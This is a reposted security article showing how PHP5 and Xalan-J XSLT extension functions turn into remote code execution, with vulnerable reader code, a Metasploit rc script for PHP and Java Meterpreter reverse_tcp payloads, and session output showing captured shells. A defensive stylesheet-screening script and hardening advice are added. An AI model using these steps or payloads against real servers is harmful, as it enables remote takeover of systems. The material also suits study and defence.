From XSLT code execution to Meterpreter shells

This article describes how to execute high-level code during the
processing of an XSL transform, with the goal of obtaining some
Meterpreter shells. It applies to any XSLT engine capable of
executing high-level code, even though the published code focuses on
PHP5 (in a non-default configuration) and Xalan-J.

Two minimalist applications processing arbitrary XML documents
and XSLT stylesheets are used as the targets. Functionally, these
applications are minimalist online readers for ATOM feeds. They
were used during my HackInTheBox and HackInParis talks and are now
publicly available.

The PHP code:

  1 <?php
  5 echo "ATOM reader (PHP + XSLT)\n";
  6 echo "\n";
  7 echo "\n";
  8 echo "This ATOM reader is coded in PHP5+XSLT, using libxslt.\n";
  9
 10 // Get parameters
 11 $url = $_GET['url'];
 12 $xsl = $_GET['xsl'];
 13
 14 // Load ATOM file
 15 $xmldoc = new DOMDocument();
 16 $xmldoc->load( $url );
 17
 18 // Load XSLT file
 19 $xsldoc = new DOMDocument();
 20 $xsldoc->load( $xsl );
 21
 22 // Register PHP functions as XSLT extensions
 23 $xslt = new XSLTProcessor();
 24 $xslt->registerPhpFunctions();
 25
 26 // Import the stylesheet
 27 $xslt->importStylesheet( $xsldoc );
 28
 29 // Transform and print
 30 print $xslt->transformToXML( $xmldoc );
 31
 32 ?>

You may notice on line 24 a call to XSLTProcessor::registerPhpFunctions(). This is
the non-default setting that we will exploit. From the
documentation: "PHP 5 >= 5.0.4 / Enables the ability to use
PHP functions as XSLT functions".

The Java code:

  <%-- The page directive below is restored: the original header lines
       (directives and HTML output) did not survive this copy. --%>
  <%@ page import="javax.xml.transform.*, javax.xml.transform.stream.*" %>
  <%
  // Get the parameters
  String xmlFile    = request.getParameter("url");
  String xslFile    = request.getParameter("xsl");

  // Create a XSLT transformer
  TransformerFactory tFactory = TransformerFactory.newInstance();

  // Configure the XSLT stylesheet
  Transformer transformer = tFactory.newTransformer(new StreamSource(xslFile));

  // Transform the XML file
  transformer.transform(new StreamSource(xmlFile), new StreamResult(out));
  %>

In both applications, the "url" parameter contains the URL of an
ATOM feed (for example http://www.us-cert.gov/channels/current.atom). The
"xsl" parameter contains the URL of the XSL stylesheet we want to
apply to the XML document.

The following one displays some basic information about the feed
and its entries:

  [XSL stylesheet listing, 18 lines, not preserved in this copy]

Here's a screenshot of the output (using the US-CERT feed):


From XSLT code execution to Meterpreter shells

OK, everything is now in order. Let's try to execute some more
interesting XSLT code, for example in order to identify the
underlying XSLT engine:

  [XSL stylesheet listing, 9 lines, not preserved in this copy]

The output under PHP5:

[Screenshot: output under PHP5]

The output under Tomcat+Xalan-J:

[Screenshot: output under Tomcat+Xalan-J]

Now, some basic high-level code displaying the current date. For
this, we need to use the right namespace. For PHP, it's
"http://php.net/xsl" and for Xalan-J, it's
"http://xml.apache.org/xalan/java/java.*".

In PHP:

  [XSL stylesheet listing, 5 lines, not preserved in this copy]

In Java:

  [XSL stylesheet listing, 6 lines, not preserved in this copy]

In order to execute arbitrary PHP code, we could try to use
eval(), include() or require(). But those are language constructs, not PHP
functions, so they cannot be called this way. Luckily, both preg_replace() and
assert() are PHP functions and can be used to execute arbitrary PHP code. We now
have everything needed to execute a PHP Meterpreter :-)

  [XSL stylesheet listing, 8 lines, not preserved in this copy]

We are done regarding PHP!
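As an added defensive example (not code from the original post), here is the screening check a maintainer of either reader could run on a fetched stylesheet before handing it to the engine: it flags the PHP and Xalan-J namespaces named above (plus the "xalan://" short form and Saxon's "java:" form, assumed from those engines' documentation) and any xsl:import/xsl:include it cannot follow; the sample stylesheets are constructed here.

```python
import xml.etree.ElementTree as ET
from io import BytesIO

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Namespace URIs through which an XSLT engine hands control to host-language
# code. PHP and Xalan-J are the two named in the article; the "xalan://" short
# form and Saxon's "java:" form are assumed from those engines' documentation.
CODE_EXEC_NS = (
    "http://php.net/xsl",                # libxslt with registerPhpFunctions()
    "http://xml.apache.org/xalan/java",  # Xalan-J, with or without /some.Class
    "xalan://",                          # Xalan-J short form
    "java:",                             # Saxon reflexive extension functions
)

def screen_stylesheet(xsl_bytes):
    """Screen a user-supplied stylesheet before it reaches the engine. Returns
    the offending (prefix, uri) declarations found on any element, plus the
    hrefs of xsl:import/xsl:include, which pull in stylesheets this scan cannot see."""
    code_exec, includes = [], []
    for event, payload in ET.iterparse(BytesIO(xsl_bytes), events=("start-ns", "start")):
        if event == "start-ns":
            prefix, uri = payload
            if uri.startswith(CODE_EXEC_NS):
                code_exec.append((prefix, uri))
        elif payload.tag in ("{%s}import" % XSL_NS, "{%s}include" % XSL_NS):
            includes.append(payload.get("href"))
    return {"code_exec": code_exec, "includes": includes}

def is_acceptable(xsl_bytes):
    """Accept only stylesheets that declare no code-execution namespace and
    pull in no other stylesheet (each of those would need the same screening)."""
    result = screen_stylesheet(xsl_bytes)
    return not result["code_exec"] and not result["includes"]

# Constructed samples (the article's own listings did not survive this copy).
HEAD = b'<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"'
BENIGN_XSL = (HEAD + b' xmlns:atom="http://www.w3.org/2005/Atom"><xsl:template match="/">'
              b'<xsl:value-of select="/atom:feed/atom:title"/></xsl:template></xsl:stylesheet>')
PHP_DATE_XSL = (HEAD + b' xmlns:php="http://php.net/xsl"><xsl:template match="/">'
                b'<xsl:value-of select="php:function(\'date\', \'Y-m-d\')"/></xsl:template></xsl:stylesheet>')
XALAN_DATE_XSL = (HEAD + b' xmlns:date="http://xml.apache.org/xalan/java/java.util.Date">'
                  b'<xsl:template match="/"><xsl:value-of select="date:new()"/></xsl:template></xsl:stylesheet>')
INCLUDING_XSL = HEAD + b'><xsl:include href="http://example.invalid/other.xsl"/></xsl:stylesheet>'

if __name__ == "__main__":
    for name, xsl in [("benign", BENIGN_XSL), ("php", PHP_DATE_XSL),
                      ("xalan", XALAN_DATE_XSL), ("include", INCLUDING_XSL)]:
        print(name, is_acceptable(xsl), screen_stylesheet(xsl))
```

Screening is a stopgap: the real fix is to drop the registerPhpFunctions() call (or pass it an explicit allow-list of function names) and, on the JAXP side, to set XMLConstants.FEATURE_SECURE_PROCESSING on the TransformerFactory, which disables extension functions. Better still, do not take the stylesheet URL from the request at all.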

We'll now look at Java, where going from printing the current date
to executing arbitrary classes is much more complex. In fact,
we'll need to use reflection in order to access enough interesting
Java features to download a remote Meterpreter JAR file. There are
three ways to use reflection: 1) write your own Java code
accessing the key Java features (and keep this code portable across
versions), which is too hard for me; 2) use Javapayload to dynamically
construct the Java code, the problem being that Metasploit doesn't
include a very recent version of Javapayload, although that's fine if
you're doing everything by hand; 3) re-use a well-tested, static Java
template that already has all the needed features.

In the current scenario, we'll take the third option (thanks @mihi42) in order to integrate nicely with Metasploit.
The resulting XSL stylesheet is complex, but works perfectly:

  [XSL stylesheet listing, 36 lines, not preserved in this copy: it declared the payload URL http://attacker/eviljava/wkaLrNQj.jar and a base64-encoded blob as variables, and ended by printing "Test Complete!"]

If we put all this logic in a dedicated Metasploit module, we
end up with "generic_xslt_payloads.rb". This module is not
available in trunk for the moment, but you can download it from ticket #6784. Copy it to
"modules/exploits/multi/misc/" and configure it using the following
rc script:

# Load the module
use exploit/multi/misc/generic_xslt_payloads

# Configure and start the PHP version
set TARGET 0
set URIPATH evilphp.xsl
set PAYLOAD php/meterpreter/reverse_tcp
set SRVHOST 192.168.2.218
set SRVPORT 5001
set LHOST 192.168.2.218
set LPORT 4001
exploit -j

# Configure and start the Java version
set TARGET 1
set URIPATH eviljava
set PAYLOAD java/meterpreter/reverse_tcp
set SRVHOST 192.168.2.218
set SRVPORT 5002
set LHOST 192.168.2.218
set LPORT 4002
exploit -j

You should get two jobs running:

msf  exploit(generic_xslt_payloads) > jobs -l -v

Jobs
====

  Id  Name                                       Payload                       LPORT  URIPATH       Start Time
  --  ----                                       -------                       -----  -------       ----------
  0   Exploit: multi/misc/generic_xslt_payloads  php/meterpreter/reverse_tcp   4001   /evilphp.xsl  Mon Jul 02 18:45:39 +0200 2012
  1   Exploit: multi/misc/generic_xslt_payloads  java/meterpreter/reverse_tcp  4002   /eviljava     Mon Jul 02 18:45:39 +0200 2012

Then provide the vulnerable applications with the link to the
corresponding XSLT code, and voilà!

msf  exploit(generic_xslt_payloads) > sessions -l

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter java/java  SYSTEM @ box08           192.168.2.218:4002 -> 192.168.2.108:1707 (192.168.2.108)
  2   meterpreter php/php    www-data (33) @ box13    192.168.2.218:4001 -> 192.168.2.113:43398 (192.168.2.113)

0wn3d !

It should be noted that 1) porting the Java version from Xalan-J
to Saxon should be trivial and 2) some client-side software, such as
XMLSpy, allows executing Java code from XSLT. The Metasploit module
was demonstrated during the HackInTheBox conference in Amsterdam,
and the video is available on YouTube (this demo starts at minute 48).

Reposted from: http://www.agarri.fr/kom/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html


Article from lcx.cc: From XSLT code execution to Meterpreter shells
